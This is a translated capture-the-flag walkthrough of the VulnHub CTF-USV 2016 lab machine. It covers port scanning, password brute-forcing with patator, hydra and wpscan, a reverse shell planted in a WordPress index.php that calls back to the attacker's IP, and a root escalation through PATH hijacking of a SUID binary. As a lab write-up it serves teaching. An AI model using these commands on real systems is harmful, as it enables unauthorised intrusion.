VulnHub: USV 2016. CTF in Romania, what are they?
- Tutorial

Good day, in this article we will consider the decision of the Romanian CTF-USV 2016 , on the topic: “Game of Thrones” . You can download a virtual machine image from the link with VulnHub.
If you are interested in how CTFs in Romania are held, please
A bit about CTF
CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenges creation, evaluation of results and building of CTF environment was provided by Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ ionutge1)
There are 7 flags in total, the following format: Country_name Flag: [md5 hash] .
Let's get started!
Let’s examine the nmap target :
$ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV -p1-65535Starting Nmap 7.01 ( nmap.org ) at 2017-01-15 19:47 MSK
Nmap scan report for 192.168.1.102
Host is up (0.00057s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22 / tcp open ssh OpenSSH 7.3 (protocol 2.0)
80 / tcp open http Apache httpd
3129 / tcp open http-proxy Squid http proxy 3.5.22
3306 / tcp open mysql MariaDB (unauthorized)
4444 / tcp open http Foundry EdgeIron switch http config
21211 / tcp open ftp vsftpd 2.0.8 or later
MAC Address: 08: 00: 27: 2B: 64: 55 (Oracle VirtualBox virtual NIC)
Service Info: Host: SevenKingdoms; Device: switch
And let's get to the flags ...
Flag 1 (Croatia)
With the first flag, everything is simple. We start nikto , which immediately informs us of the presence of an unusual header:
$ nikto -h 192.168.1.102+ Uncommon header 'x-xss-protection' found, with contents: Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg ==
Decode it:
$ echo Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg== | base64 -d
Croatia Flag: 0c326784214398aeb75044e9cd4c0ebbFlag 2 (Italy)

Here such a dragon can be seen when connecting via ssh . And at the very bottom of the encrypted line:
wDOW0gW / QssEtq5Y3nHX4XlbH / Dnz27qHFhHVpMulJSyDCvex ++ YCd42tx7HKGgB
Upon careful inspection, you will notice the presence of some of the letters that make up the picture. Putting it all together we get:
AES ECB xxxxx0000000xxxxxx
We have the algorithm, the key and the encrypted message, for example, here we decrypt and get the second flag:
Italy Flag: 0047449b33fbae830d833721edaef6f1
Flag 3 (Portugal)
We pass to web. We have a website (port 80) and a proxy (port 3129). After specifying the address and port of the proxy server, in this case the attacked machine, in the settings, open the site:

Not much, continue:

Normal WordPress, nothing remarkable. Opening the index page, we get to the blog, with several articles on the “Game of Thrones” . The first thing that catches your eye is the following publication:

Having opened this image, we notice that it is located in the hodor directory :

Having gone into that, we are offered to download the archive:

An image is waiting for us in the archive:

And the flag:
$ echo UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y= | base64 -d
Portugal Flag: a2663b23045de56c7e96a406429f733fFlag 4 (Paraguay)
At the very bottom of the page, attention is drawn to this post:

Parsim site, and collect a dictionary with passwords for brute force:
cewl --proxy_host 192.168.1.102 --proxy_port 3129 http://192.168.1.102/blog/ > blog.lstHaving started the search, after a while, patator gives the correct password:
$ patator http_fuzz http_proxy=192.168.1.102:3129 url='http://192.168.1.102/blog/wp-login.php?action=postpass' method=POST header='Referer: "http://192.168.1.102/blog/index.php/2016/10/16/the-secret-chapter/"' body='post_password=FILE0&Submit=Enter' 0=blog.lst -x ignore:fgrep='post-password-form' follow=1 accept_cookie=1
We introduce it and get access to the contents of this publication:

Decode the base64 line located here and get a new flag:
$ echo UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk= | base64 -d
Paraguay Flag: 4761b65f20053674657c7e6186628a29Flag 5 (Thailand)
If you believe the contents of this post, then the password is right before our eyes, yes, the picture here is clearly in the subject. But if you look closely, there is a phrase below:
She use s the F ield T raining P reparation for her army.
Well, we know where to log in, the password remains. First I tried to enter individual words, then I added snippets of phrases there, and soon hydra found what I needed:

Connect:
$ ftp 192.168.1.102 21211
ftp> ls -ahl
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x 2 1000 1000 4096 Dec 05 20:05 .
dr-xr-xr-x 2 1000 1000 4096 Dec 05 20:05 ..
-rw-r--r-- 1 0 0 94 Dec 05 20:04 .note.txt
-rw-r--r-- 1 0 0 32 Dec 05 20:05 readme.txt
226 Directory send OK.Download all available files, then we will study them:
ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for readme.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.00 secs (226.4 kB/s)
ftp> get .note.txt
local: .note.txt remote: .note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .note.txt (94 bytes).
226 Transfer complete.
94 bytes received in 0.00 secs (791.4 kB/s)The first file is nothing interesting:
But the second is worthy of attention:
- = Daenerys = -
We learned the password hint - these are the names of her children, google quickly suggested which children were in question and what their names were. Therefore, starting crunch we proceed to generate the dictionary:
$ crunch 1 1 -p Rhaegal Viserion Drogon > dragonsWe send this to wpscan to iterate over:
$ sudo ./wpscan.rb --proxy 192.168.1.102:3129 --url http://192.168.1.102/blog/ --username mother_of_dragons --wordlist dragons
After some time, we get the password from the WordPress admin panel. We log in and find the following flag in the profile of the current user:

$ echo VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM= | base64 -d
Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733Flag 6 (Mongolia)
As it turned out, Daenerys has administrator rights on this blog, so by editing the index.php file , we’ll make a shell for ourselves by adding the line:
system('bash -i >& /dev/tcp/192.168.1.124/4444 0>&1');We start netcat, reload the page in the browser, and we get the shell:

Having looked around in the system, attention is drawn to the reward_flag.txt file , in the web server directory:
[http@arch blog]$ ls -ahl ../
total 92K
drwxr-xr-x 3 root root 4.0K Nov 17 15:43 .
drwxr-xr-x 4 root root 4.0K May 31 2013 ..
drwxr-xr-x 6 http http 4.0K Jan 15 19:52 blog
-rw-r--r-- 1 root root 59K Nov 16 19:59 gtr.jpg
-rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html
-rw-r--r-- 1 root root 65 Nov 17 15:41 reward_flag.txt
-rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messengerLet's open it, apparently, there should be a flag:
[http@arch blog]$ cat ../reward_flag.txt
TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=
[http@arch blog]$ echo TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ= | base64 -d
Mongolia Flag: 6b49c13cccd91940f09d79e142108394Flag 7 (Somalia)
In the directory with the last flag lies another winterfell_messenger application , which, judging by the presence of the SUID bit, will probably help to increase its privileges in the system. Run it and see what it does:
[http@arch http]$ ./winterfell_messenger
cat: /root/message.txt: No such file or directorySo, what about the lines?
[http@arch http]$ strings ./winterfell_messenger
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-8
AWAVA
AUATL
[]A\A]A^A_
cat /root/message.txt
;*3$"
GCC: (GNU) 6.1.1 20160802
GCC: (GNU) 6.2.1 20160830
init.c
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6916
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
You don’t even need to reverse it, we have setuid , and a system that uses the relative path for the cat command , and it’s known from the system documentation that:
system () executes the commands specified in string , in turn invoking the command / bin / sh -c string , and returns when the command is completed.
In general, we follow the familiar algorithm:
[http@arch http]$ PATH=/tmp:$PATH
[http@arch http]$ echo "/bin/bash" > /tmp/cat
[http@arch tmp]$ chmod +x catRun the vulnerable program and get the shell:
[http@arch tmp]$ /srv/http/winterfell_messenger
/srv/http/winterfell_messenger
id
uid=0(root) gid=33(http) groups=33(http)In the root directory we find the last flag:
echo U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA== | base64 -d
Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34And we accept congratulations:

As indicated in the description, this is their first CTF . It will do for the first time, but it’s not worth repeating, let's hope they will continue to develop this topic, adding more sophisticated tasks, because in real life, unfortunately, nobody will surprise anyone with a banal scan of directories.